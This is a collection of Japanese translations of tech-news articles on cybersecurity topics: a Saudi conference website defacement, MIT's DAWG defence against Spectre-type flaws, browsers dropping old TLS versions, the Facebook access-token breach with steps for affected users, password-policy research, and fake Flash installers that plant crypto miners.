当面HTCは、この事業で技術のパイロットを行なう。そして、小さなコアグループのユーザーからのフィードバックを入手する。スマートフォン市場で苦戦している同社にとって、これが今後の主力デバイスになることは、想像しづらいけどね。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

サウジアラビアの‘砂漠のダボス’のWebサイトがハックされ皇太子を非難する合成画像で汚損された

サウジ政府が近く開催するFuture Investment InitiativeカンファレンスのWebサイトがハックされ、殺されたサウジのジャーナリストJamal Khashoggiの画像が‘落書き’された。

汚損後のサイトのスクリーンショットがいくつもツイートされ、そこには王国の実質的な支配者であるMohammed bin Salman皇太子が剣を振りかざしている合成写真が載っている。サイトのテキスト部分は、王国の“野蛮で非人間的な行為”に対する非難に置き換えられている。それはKhashoggiの死だけではなく、イエメンで今行われている攻撃への、政府の関与にも言及している。

サイトのホームページには、何人かのサウジの個人の名前と電話番号も載っている。それらは、政府の職員や政府系企業の役員たちだ。

サイトは、汚損されたあと、月曜日(米国時間10/22)にオフラインになった。

汚損の犯人は、名乗りを上げていない。それが現れたのは、サウジの政権が、Khashoggiがイスタンブールの同国領事館で“殺された”ことを認めてから数日後で、そのときはすでに、そのThe Washington Postのコラムニストが婚姻届の用紙を得るために入館してから2週間以上経っていた。サウジの政府職員たちは、彼は“殴り合い”の後で死んだと主張したが、西側諸国はそれをナンセンスと非難した。トルコ政府がリークしたと思われる録音は、ジャーナリストが殴られ、殺され、そして切断されたと主張している。

イギリスとフランスとドイツは、声明で、彼のまだ行方不明の遺体に関する明確な説明を求めている。トルコは火曜日(米国時間10/23)に、この殺人に関する詳細を発表すると予想されている。

Future Investment Initiativeは“Davos in the Desert”(砂漠のダボス)とも呼ばれ、スイスで行われる投資カンファレンスに擬している。開催は、今週後半の予定だ。サウジアラビアはアメリカのテクノロジー企業に数十億ドルを投資しているが、しかしこのカンファレンスは、ジャーナリストの殺人のあと、数十名もの著名な投資家やテクノロジー企業、そしてビジネスリーダーたちが不参加を表明している。

・関連記事: カショーギ事件はシリコンバレーの一つの時代の終焉か–SoftBank新ファンドの行方も不透明

Silicon Valley hoped the Khashoggi story would go away; instead, it may end an era

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

MITで開発されたメモリ分割方式により未来のMeltdown/Spectreバグを防げる

今年、研究者たちがIntel, AMD, そしてARMのチップに、設計上の根本的な弱点を見つけたときには、今の世代のコンピューターのプロセッサーのほとんどすべてに対し、極刑が求刑されたようだった。その設計ミスによって、コンピューターのメモリーから機密データを盗むことが可能だからだ。

そのMeltdownおよびSpectreと呼ばれる脆弱性は1995年まで遡(さかのぼ)り、アプリケーションがシステムのメモリーの、自分にパーミッションのない部分にアクセスできないようにしている壁に穴を開けた。それにより有能なハッカーは、パスワードや暗号鍵などの機密データが保存されている場所を見つけることができる。多くの企業がその欠陥の一部を緩和してきたが、真の長期的な解決は、コンピューターのプロセッサーの設計の最初からのやり直しであることも知っていた。

このたび、MITのComputer Science and Artificial Intelligence Laboratory(CSAIL)の研究者たちが、将来にわたって、MeltdownやSpectreのような欠陥を防止できる方法を見つけた。

アプリケーションが何かをメモリーに保存したくなったら、置くべき場所をプロセッサーに尋ねる。しかしメモリーの探索は遅いので、プロセッサーは“speculative execution”(投機実行)と呼ばれるトリックを使って、複数のタスクを同時に動かし、正しい空きメモリーを探そうとする。しかし悪質なハッカーは、その同じテクニックを使って、アプリケーションが自分に許されていない場所のメモリーから読めるようにする。

MITのCSAILによると、彼らのテクニックはメモリーを分割することによって、データが同じ場所に保存されないようにする。それを彼らは、“secure way partitioning.”(安全な方法によるパーティショニング)と呼んでいる。

彼らはこの方式をDAWG、“Dynamically Allocated Way Guard”(ガードを動的に割り当てる方法)と名付け、それは滑稽な名前のようにも聞こえるが、IntelのCache Allocation Technology, CAT(キャッシュ割り当て技術)を補完する意味を持つ。彼らの研究論文によると、DAWGはCATと同じような仕事をし、使うにあたってデバイスのオペレーティングシステムの変更箇所も少ない。したがって、Meltdownのフィックスとして問題のコンピューターにインストールするのも容易である。

ペーパーの著者の一人Vladimir Kirianskyによると、このテクニックは“共有が起きるべきところと、起きるべきでないところとの、明確な境界を確立し、機密情報を扱うプログラムがそのデータをまあまあ安全に保てるようにする”。

この技術は通常のコンピューターを保護するだけでなく、クラウドの脆弱なインフラストラクチャも保護できる。

DAWGはすべての投機的攻撃を防げるわけではないが、今研究者たちは技術の改良に取り組んでおり、すべての攻撃ではないものの、これまでよりも多くの攻撃を防げるようになる、と言っている。

しかし彼らの技術を実際にIntelなどのチップメーカーが採用すれば、DAWGのようなテクニックは“パブリッククラウドのインフラストラクチャに対する信頼を再興し、ハードウェアとソフトウェアの共同設計によりパフォーマンスのオーバヘッドも最小化できる”、という。

〔関連記事: スペクター! メルトダウン! カーネル・パニック!――今回の脆弱性はほぼ全員に影響が及ぶ。〕

Kernel panic! What are Meltdown and Spectre, the bugs affecting nearly every computer and device?

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

メジャーなブラウザーが全員同時にTLS旧版(1.0, 1.1)のサポートを停止する

Firefox, Chrome, Edge, Internet Explorer, そしてSafariなどのWebブラウザーがすべて、オンラインのセキュリティプロトコルTLSの古いバージョンのサポートを停止する。TLSは、インターネット上の暗号化された情報交換のほとんどすべてで使われており、長く使われているあまり安全でないTLS 1.0と1.1も、今だに多くの接続で許容されている。しかしそれも、もう終わりだ。

Transport Layer Securityはコミュニティが開発したスタンダードで、その1.0は20年近く前にリリースされた。しかし1.0とその親戚の1.1には欠陥があって、暗号化による安全な通信に使うのは危険であることが、前から知られていた。2008年に1.2がその重大な欠陥に対処し、現在は大多数のクライアントがこれを使っている。今年初めにリリースされた1.3は、このスタンダードを改良および合理化したが、これにアップデートしたサーバーはまだそれほど多くない。

The messy, musical process behind the web’s new security standard

旧版のサポート停止についてMozilla, Google, Microsoft, WebKitの各陣営がそれぞれ別々に、同じような発表をしている。1.0と1.1は2020年初頭に全廃される。3月と言っている発表もあるが、他もだいたいそのころだろう。

MicrosoftのKyle Pflugがこう書いている: “セキュリティの技術が無変更であり続ける期間として20年は長い。TLS 1.0と1.1の弊社による最新の実装に重大な脆弱性は見当たらないが、サードパーティによる脆弱な実装は存在する。新しいバージョンへ移行することによって、誰にとってもより安全なWebが確保されるだろう”。

ユーザーは、何もしなくてよい。ブラウザーもアプリケーションも、前と同じように動く。おそらく今は、1.2を使っているところが多いだろう。Mozillaが作ったチャート(下図)によると、古いバージョンを使っているところはごくわずかだ。

しかしこれらの、数少ない古い危険な接続は、いろんなもので使われている。レガシーの組み込みマシンがあちこちにあるし、セキュリティスタックを何年もアップデートしていない古いアプリケーションや、ハックされたデバイスもある。そのことを、あなただけでなく、あなたのご両親も知らない。

リードタイムを長くしたのは、たとえば地方自治体などに重要なレガシーシステムがあるからだ。それらは、TLS旧版のサポート停止で動かなくなる〔例: あるアプリケーションが使えない〕かもしれない。その可能性も含め、本格的なシステム監査が必要だ。もっと何年も前に、やるべきだったのだが。

今回の変更によって、ネット上で誰もが前より安全になるが、すべては前と変らず動き続ける。そういう設計だから。

〔TLS 1.3関連本誌翻訳記事: IETFがTLS 1.3を承認、悪質なハッカーや盗聴者が仕事をしづらくなる仕掛けを盛り込む最新のトランスポートレイヤーセキュリティ(TLS)プロトコルを強化するライブラリを、Facebookがオープンソース化FirefoxやFacebookなどがインターネットの新しいセキュリティプロトコルTLS 1.3をすでにサポート。〕

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Facebookの3000万ユーザーの個人情報が漏洩、Facebookならこれぐらいは‘軽微’!?

Facebookが、2週間前に公表したデータ漏洩事件詳細を発表した。最初に推計された5000万ではなく3000万のユーザーが、アクセス情報をハーカーに盗まれた。ご自分について確認したい方は、Facebook’s Help Centerへ行くとよろしい。被害を受けたユーザーにはFacebookが盗まれた情報の詳細を告知し、復旧方法を教える。アクセスはされたけれど、彼らにコピー〜ダウンロードされなかった情報もあると思われるが、その詳細は開示されていない。

Facebookのプロダクトマネージャー担当VP Guy Rosenが、記者たちにこう述べている: “この件に関しては目下FBIの捜査に協力している。FBIはわれわれに、捜査の間犯人に関する情報を明かさないよう求めている”。それは、犯人による証拠隠滅を防ぐためだ。

3000万のうち1500万は、名前、電話番号、そして場合によってはメールアドレスをアクセスされている。1400万はそれプラス、履歴書的情報…ユーザー名、性別、位置、言語、既婚・未婚、宗教、出生地、現住地(本人申請)、誕生日、Facebookにアクセスしているデバイスのタイプ、学歴、職業、最近訪れたサイト10箇所、フォローしている人またはPage、最近行った検索15件、などなど…にアクセスされた。残りの100万は、情報にアクセスされていない。

Facebookのその他のアプリ、Messenger, Messenger Kids, Instagram, WhatsApp, Workplace, Pages, それらに対する支払い決済情報、サードパーティアプリ、アドバタイザー、デベロッパー、などはアクセスされていない。Facebookによると、FBIの捜査中は犯人に関する証拠を明かさないことを、Facebookは法執行当局により求められている。

Facebookによると、ハッカーは、ユーザーのプロフィールを他人の観点から見るプライバシー機能“View As”の三つのバグの組み合わせを悪用した。それによって、そのアカウントの友だちにアクセスし、40万のアカウントのアクセス情報を盗んだ。そして別の方法を使って、彼らの友だち3000万の情報を握った。

多くのデータ漏洩と違って今回のは、最初に予想されたよりも軽微だった、とみなされている。ユーザーは、ログインの再行を求められたときちょっと戸惑ったが、今はこの事故のことを忘れているようだ、という。Q3の決算報告ではFacebookのユーザー数がやや減るおそれもあるが、盗まれたデータが実際に悪用されないかぎりは、Webの至るところで日々起きているエンドレスなサイバーセキュリティエラーのノイズの中で消えてしまうだろう。そのノイズの中には、FacebookのコンペティターGoogle+の閉鎖の遠因となったデータ遺漏事件も含まれている。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

長いパスワードはパスワードの悪用や同一パスワードの再利用を大幅に減らす

インディアナ大学の研究者たちが、パスワードに関する厳しい規則は…相当面倒なものを除いては…実際に効果があることを実証した。その研究を行った院生のJacob Abbott, 同大のCIO Daniel Calarco, そしてL. Jean Camp教授らは、彼らの研究成果を“Factors Influencing Password Reuse: A Case Study.”(パスワード再利用の影響要素に関する事例研究)と題するペーパーで発表した。

Abbottはこう述べている: “われわれのペーパーは、文字数15文字以上などの厳しい要件により、インディアナ大学のユーザーの圧倒的多数(99.98%)が、パスワードをほかのサイトで再利用しなくなることを示している。制限文字数が短い他の大学では40%もの高率でパスワードが再利用されている”。

パスワードの再利用に対する規則の影響力を知るために、インディアナ大学を含むアメリカの22の大学のパスワードに関する規則を調べた。そして、オンラインで公開されている二つの大きなデータセットから、メールとパスワードの組み合わせを取り出した。それらのデータセットには、メールアドレスとパスワードの組み合わせが13億件ある。それらのメールアドレスとパスワードの組み合わせを大学のドメインごとに分類し、各大学の公式のパスワード規則と比較した。

結果は明白であった: 厳しいパスワード規則によって、その大学の個人データ漏洩リスクは大幅に低減していた。

要約すると、長いパスワードを求める厳しいパスワード規則により、パスワードの詐欺的利用や本人のパスワード再利用が99%、すなわちほぼ完全に防止できている。また同研究によると、パスワードの中で自分の名前やユーザー名を使わない、という規則も、セキュリティに貢献している。結局のところ、厳しいパスワード規則がある方が、なにもないよりも、はるかにましである。当たり前のことのようだが、覚えておくべき、そして必ず思い出すべき、重要なポイントだ。

[原文へ]
(翻訳:iwatani(a.k.a. hiwa

Facebookアカウントがハックされたかチェック――被害にあっていたらこうしておこう

Facebookでは2週間前のハッキングにより3000万人のアクセストークンがリークしたことを発表している。まず読者のアカウントが被害にあっているかどうか確かめ、被害にあっていたら対策しておこう。

  1. 次のリンクからFacebookのヘルプセンターを訪問する(ログイン状態であることが必要)  https://www.facebook.com/help/securitynotice?ref=sec.
  2. 下にスクロールして“Is my Facebook account impacted by this security issue?”という行を探す〔空行の後に大きな文字で書かれている〕。
  3. 読者のアカウントがハッキングされた3000万に含まれていたかどうかはYesまたはNoで示される。もしアカウントがハッキングされていた場合は、下のスクリーンショットのような警告がニュースフィードにも表示されるはずだ。
  4. 判定がYesだった場合、アカウントは以下のいずれかのカテゴリーのハッキングを受けている。
    A. 氏名、メールアドレス、電話番号がアクセス可能だった(1500万アカウント)。.
    B. Aのデータに加えて以下の情報がアクセス可能だった(1400万アカウント):ユーザーネーム、性別、住所、言語、交際関係、宗教、出身地、居住地、生年月日、投稿に使ったデバイスの種類、学歴、職歴、チェックインないしタグ付けされた最新の10箇所、運営するウェブサイト、フォローしている人々あるいはページ、直近の15回の検索。
    C. アクセストークンは盗まれたが、幸運にも、それを使ってアクセスされたことは一度もない(100万アカウント)。

アカウントがハックされていたとわかった場合、どうすべきか?

  1. どのカテゴリーのアカウントであってもFacebookのパスワード、クレジット情報を変更する必要はない。これらの情報がハックされた形跡はない。
  2. メールやメッセージへのスパムに注意。ハッカーが盗んだデータを不注意な企業に売り渡している可能j性がある。.
  3. フィッシングに注意。リーク情報を利用してメールを送りつけ、偽のアカウントにおびき寄せてパスワードを入力させようとするフィッシングの試みが増加する可能性がある。Facebookから送信されたように見える不審なメールがあった場合、真正なものかどうかこちらから確認できる。
  4. カテゴリーBのユーザーは経歴がアクセス可能になっていたので、口座を持っている銀行と契約している携帯電話会社に連絡してセキュリティーを強化しておこう。ハッカーは盗んだ情報を利用し、電話などで巧みに本人になりすますかもしれない。詳細な経歴を知っていれば「秘密の質問」に正しく答えるなどのソーシャルエンジニアリングが可能だ。
    ハッカーがユーザーのアカウントを盗むことができれば、本人になりすまして連絡先にスパムする、ソーシャルメディア上のハンドル名を知って企業に売るなどができる。また登録された携帯電話の番号を自分の携帯電話の番号に変更して2要素認証を破ろうとする可能性もある。「秘密の質問」や暗証番号を変更しておくのはよい考えだ〔経歴に記載されている生年月日その他の数字、テキストをパスワードや暗証番号に利用しない〕。

またFacebookのアカウントに登録中のデータをチェックし、そのすべてがそこに置かれている必要があるかどうか見直しておこう。

画像: Bill Hinton / Getty Images

原文へ

滑川海彦@Facebook Google+

    • ユーザーのコンピューターに暗号通貨の採掘マルウェアを植え付ける偽のFlashインストーラーが急増

    かつて人気者だったWebのプラグインFlashが、まだなかなか死なないとお嘆きのあなた、実はそれは、あちこちに出没するFlashのインストーラーに寄生しているマルウェアも、すぐには死なないことを意味しているのだ。というよりむしろ、彼らの手口はますます陰険になっている。

    Palo Alto Networksの最新の調査によると、最近急増しているFlashインストーラーは、暗号通貨を採掘するマルウェアをセキュリティの弱いコンピューターに投下するだけでなく、Flashがすでにあっても、また新たにインストールする。

    研究者たちによるとそれは、本物のFlashインストーラーだと思わせるための、騙(だま)しの手段だ。

    そのインストーラーを開くと、こっそりとXMRigがインプラントされる。それはオープンソースの暗号通貨採掘プログラムで、コンピューターのプロセッサーとグラフィクスカードを使って採掘を開始する。生成された通貨はすべて、Moneroのウォレットへ吸い上げられ、追跡はほぼ不可能になる。採掘マルウェアがインプラントされたら、次にインストーラーはAdobeのWebサイトから本物のFlashインストーラーをダウンロードして、Flashをインストールする。

    研究者たちは今年の3月だけでも、100あまりの偽のFlashアップデーターを見つけた。

    Flashという、長年バグの多い、攻撃されやすいプラグインが、今でも頭痛の種になっていることは、皮肉な現象だ。被害者候補のコンピューターにFlashがなくて、マルウェアをプッシュすることができなければ、ハッカーはそのイミテーションを使って、攻撃の足がかりにする。Flashが大きな問題になってからGoogleは、10年近く前に、Flashやその他のプラグインをサンドボックスに囲った。当時もFlashを利用するマルウェアが、蔓延していた。

    でもその後、普遍的にサポートされていてFlashより使いやすいHTML5の普及とともに、Flashの利用は急速に衰退した。

    Adobeは2020年に、Flashを引退させる予定だ。そのあとは、偽のFlashインストーラーも影を潜めるだろうか?

    [原文へ]
    (翻訳:iwatani(a.k.a. hiwa